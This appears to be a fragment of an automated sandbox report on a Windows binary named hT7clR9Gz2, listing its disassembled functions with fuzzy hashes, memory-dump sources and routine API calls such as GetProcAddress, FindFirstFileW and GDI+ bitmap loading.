                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 3e1654117fde188dfdee8a1f0dd70bde534a7f3e2bb373501df2ff7938edfe24
                                                                      • Instruction ID: b373954b7fd871d61a90a012db405f63789697489265f86fc78b798a7074d756
                                                                      • Opcode Fuzzy Hash: 3e1654117fde188dfdee8a1f0dd70bde534a7f3e2bb373501df2ff7938edfe24
                                                                      • Instruction Fuzzy Hash: C94136B0905B40DAE724DF798889AE6FBE5BF19300F50492EE5FE87282CB356654CB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: bc896701a9e6079d5dfb714a5ddb75acf20f3ad16447b5bc03dce23c2ab802f7
                                                                      • Instruction ID: 9521003f41e993ffa7940d6591df327545a98a70701325107d711f2d15829fe9
                                                                      • Opcode Fuzzy Hash: bc896701a9e6079d5dfb714a5ddb75acf20f3ad16447b5bc03dce23c2ab802f7
                                                                      • Instruction Fuzzy Hash: 332104B1E40211ABDB14AF74CC45A6A7778FB18714F04053BE506EB782D378DA00C6A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007DB098
                                                                        • Part of subcall function 007C13DC: __EH_prolog.LIBCMT ref: 007C13E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 46bc0bb02841a4d8d0f0e60e98eb9b5333b112d36f2d82f3566235c75c81de92
                                                                      • Instruction ID: f47704236eae0890629096c67cfa8ebe79cd5387a25d77a123a7a7028bdeb96c
                                                                      • Opcode Fuzzy Hash: 46bc0bb02841a4d8d0f0e60e98eb9b5333b112d36f2d82f3566235c75c81de92
                                                                      • Instruction Fuzzy Hash: 7B317E71C01249EACF15DFA5C855AEEBBB4AF09304F5044AFE409B7342DB39AE04CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 007EACF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc
                                                                      • String ID:
                                                                      • API String ID: 190572456-0
                                                                      • Opcode ID: 3fc984c4d653477401db064c5d2c56ef6d3644215c2005bb4821c5cb0d5e369f
                                                                      • Instruction ID: dd2045d14f75e296d7733d61ba86eb4d3185141d7c4eedbae956bd6fbc931e19
                                                                      • Opcode Fuzzy Hash: 3fc984c4d653477401db064c5d2c56ef6d3644215c2005bb4821c5cb0d5e369f
                                                                      • Instruction Fuzzy Hash: B911CD337025657F9B25DE2ADC5056A7395AB887607268120FD15EB274D738FC01C7E2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: f41d047cd0cc50803797f89bc69f4ed64182aa12a9fa35fed708767748c02a47
                                                                      • Instruction ID: b8b0521e34942b3dbaa6fdd4d266f90e37a45539d9be8d8ce4af2280a7ba6aa6
                                                                      • Opcode Fuzzy Hash: f41d047cd0cc50803797f89bc69f4ed64182aa12a9fa35fed708767748c02a47
                                                                      • Instruction Fuzzy Hash: 32017333900968EBCF21AB68C849EDEB735BF88740B01412DE952B7212DA3C9D1086A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 007E3C3F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc
                                                                      • String ID:
                                                                      • API String ID: 190572456-0
                                                                      • Opcode ID: a0b9cd25462dfaf3263a4b4e320992ab88dfd3904aadcef176684b6625e770e2
                                                                      • Instruction ID: afa7df744d63d5d812647057d9367e2775f9ec2549f774e0f5acf6c09139e675
                                                                      • Opcode Fuzzy Hash: a0b9cd25462dfaf3263a4b4e320992ab88dfd3904aadcef176684b6625e770e2
                                                                      • Instruction Fuzzy Hash: AAF0EC32202256AFDF114E6AEC089AA779AFF0DB217204125FA05E71E0DB35DA20C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 7b3599e62bb4758f708f5f400ba38f85c5ee456483229821462a99f3095c665b
                                                                      • Instruction ID: 16f3f41ab1e6b7db100dfd2675366359065d1929ee1bab0d0f163745e72e1302
                                                                      • Opcode Fuzzy Hash: 7b3599e62bb4758f708f5f400ba38f85c5ee456483229821462a99f3095c665b
                                                                      • Instruction Fuzzy Hash: 45E06D322072E5A6EAF527779D09B9B7649AB4E7A4F194161AC1C97091CF6CCC0182E3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C5AC2
                                                                        • Part of subcall function 007CB505: __EH_prolog.LIBCMT ref: 007CB50A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 94a0e2a7a40acddbbfd0b5e1316edf857fb5051f23d787cd95ed09e66501aae1
                                                                      • Instruction ID: 08925c10da9596860389136687395eac0faf88d0363ac1214f038ee2c6f60f02
                                                                      • Opcode Fuzzy Hash: 94a0e2a7a40acddbbfd0b5e1316edf857fb5051f23d787cd95ed09e66501aae1
                                                                      • Instruction Fuzzy Hash: 48018C30810794DAD725E7B8C049BEDFBB49F64304F58848EE45653382CBB86B08D7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,007C95D6,?,?,?,?,?,007F2641,000000FF), ref: 007C963B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: caebed772d8e3dbe17b77574a458eb814da0bb3d9ae68c14f8a7e4536e8c76a9
                                                                      • Instruction ID: b0d57f7d90305979e3da3214fcfcab4e11c5d635369c207de62d7b684a2661ef
                                                                      • Opcode Fuzzy Hash: caebed772d8e3dbe17b77574a458eb814da0bb3d9ae68c14f8a7e4536e8c76a9
                                                                      • Instruction Fuzzy Hash: CFF08270482B159FDB708A64C85CF92B7F8AB12331F145B1ED2E7629E0D779698DCA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007CA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6C4
                                                                        • Part of subcall function 007CA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6F2
                                                                        • Part of subcall function 007CA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6FE
                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007CA598
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Find$FileFirst$CloseErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1464966427-0
                                                                      • Opcode ID: a6c9b9025a38e85067a93bd1b8af661639a5e0926e13b0c8bf7c8ed1a6b7cc22
                                                                      • Instruction ID: bb424e2fb7074ab3ccd3b64ac235d93a74813781a01ee987c677f109781e61e1
                                                                      • Opcode Fuzzy Hash: a6c9b9025a38e85067a93bd1b8af661639a5e0926e13b0c8bf7c8ed1a6b7cc22
                                                                      • Instruction Fuzzy Hash: 77F0BE32008394FACA2257B48808FCA7B906F1A33AF04CA4DF0F952096C26910A48B33
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 007D0E3D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ExecutionStateThread
                                                                      • String ID:
                                                                      • API String ID: 2211380416-0
                                                                      • Opcode ID: 59d3d4bea15ee2f8d7d3694644b4d293958089838c0e36522c19def32a716b7e
                                                                      • Instruction ID: 6a8d6a7549d21a388f0393257c04020b2be10bc59de3ce5e17658bb790d570e6
                                                                      • Opcode Fuzzy Hash: 59d3d4bea15ee2f8d7d3694644b4d293958089838c0e36522c19def32a716b7e
                                                                      • Instruction Fuzzy Hash: 01D01251602094A6EE213339686DBFE27269FC6321F4D006FB18557382CE5C4C86A2B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 007DA62C
                                                                        • Part of subcall function 007DA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007DA3DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                      • String ID:
                                                                      • API String ID: 1915507550-0
                                                                      • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                      • Instruction ID: 02182877333e7ae474f1bdb3b37b87b9d246cfea7820f9d2f241a5eb828ff58d
                                                                      • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                      • Instruction Fuzzy Hash: 5FD0C971214209FADF426B61CC16D6E7ABAFB01340F048127B842D9391EAF9E910A662
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,007D1B3E), ref: 007DDD92
                                                                        • Part of subcall function 007DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DB579
                                                                        • Part of subcall function 007DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB58A
                                                                        • Part of subcall function 007DB568: IsDialogMessageW.USER32(0001047C,?), ref: 007DB59E
                                                                        • Part of subcall function 007DB568: TranslateMessage.USER32(?), ref: 007DB5AC
                                                                        • Part of subcall function 007DB568: DispatchMessageW.USER32(?), ref: 007DB5B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                      • String ID:
                                                                      • API String ID: 897784432-0
                                                                      • Opcode ID: 71be923d89469848a577f644aedac881568609d814129601bbc564ec1c2a3ce7
                                                                      • Instruction ID: f418f95ce230fe2506701ead8c291af21c6eb134223bdd19eaaa4c8cf6b92fa6
                                                                      • Opcode Fuzzy Hash: 71be923d89469848a577f644aedac881568609d814129601bbc564ec1c2a3ce7
                                                                      • Instruction Fuzzy Hash: 34D09E31144300FAD6122B51DD0AF0A7AB2BB88B04F404555B285740B18676AE71DF15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DloadProtectSection.DELAYIMP ref: 007DE5E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: DloadProtectSection
                                                                      • String ID:
                                                                      • API String ID: 2203082970-0
                                                                      • Opcode ID: 491fceac09d2015b027954d92d18a6fda0db720a1f9c8e8ea4aa2b893f53a6e2
                                                                      • Instruction ID: 9151c0985221c0f21dd1af735b3b5b0d1f4772a1a022ad24e247640f7652ce2e
                                                                      • Opcode Fuzzy Hash: 491fceac09d2015b027954d92d18a6fda0db720a1f9c8e8ea4aa2b893f53a6e2
                                                                      • Instruction Fuzzy Hash: 78D0A9B8080240CACA13FBA8AC8E7143370B330B40FE04153F216CA390CA6C8081C605
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileType.KERNELBASE(000000FF,007C97BE), ref: 007C98C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      • Opcode ID: 139e764b98270b3498058b3be82b6c06815304738c2d7e6ebdb0d0cbf8ccf2da
                                                                      • Instruction ID: e32a8b5cee2e588f2e38cb09685c06164e9769ec45c0d4b5b7272d3ce39a3871
                                                                      • Opcode Fuzzy Hash: 139e764b98270b3498058b3be82b6c06815304738c2d7e6ebdb0d0cbf8ccf2da
                                                                      • Instruction Fuzzy Hash: 79C01234400206968EA08A24984C9A977A2AB533A67B486DCC2288A0E1C32ACC87EB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 93cdf609a77bace700fa386b238fc2167c95f0e707b51dbd52e39a92ca3a1066
                                                                      • Instruction ID: 35c954b4a7da728ffb241c0d339c7a16dd2790a10b1f0623f07d5e048f78c9b3
                                                                      • Opcode Fuzzy Hash: 93cdf609a77bace700fa386b238fc2167c95f0e707b51dbd52e39a92ca3a1066
                                                                      • Instruction Fuzzy Hash: 33B012E129C054FD3106B1442D06C37022CD5C0B10330D02FFA04C9380D84C4C481433
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: ac3eb0d56b33b5adb58cfe0476b55ee897eb810d37eb6ca4ab72b43d8686d6e8
                                                                      • Instruction ID: e0234313aca4ded063d4b6979aa9547b50024e3353ffa62d5756633466e5630a
                                                                      • Opcode Fuzzy Hash: ac3eb0d56b33b5adb58cfe0476b55ee897eb810d37eb6ca4ab72b43d8686d6e8
                                                                      • Instruction Fuzzy Hash: 10B012F129C054FC3106B1442D06C37022CC5C0F10330902FFA04C9380D84C4E441433
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: cc0618744a201bd22b5de2d4d9855dc8079a8a4cdeae3da05260cac7fa660e88
                                                                      • Instruction ID: f8b3950adb916fc97f2f4906c994c460fbb5c9d35d83afcadc319a76bbffd5be
                                                                      • Opcode Fuzzy Hash: cc0618744a201bd22b5de2d4d9855dc8079a8a4cdeae3da05260cac7fa660e88
                                                                      • Instruction Fuzzy Hash: 31B012E139C054BD310671442E06C37022CD4C0B10330D02FF704D9380D84C0C4D1433
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
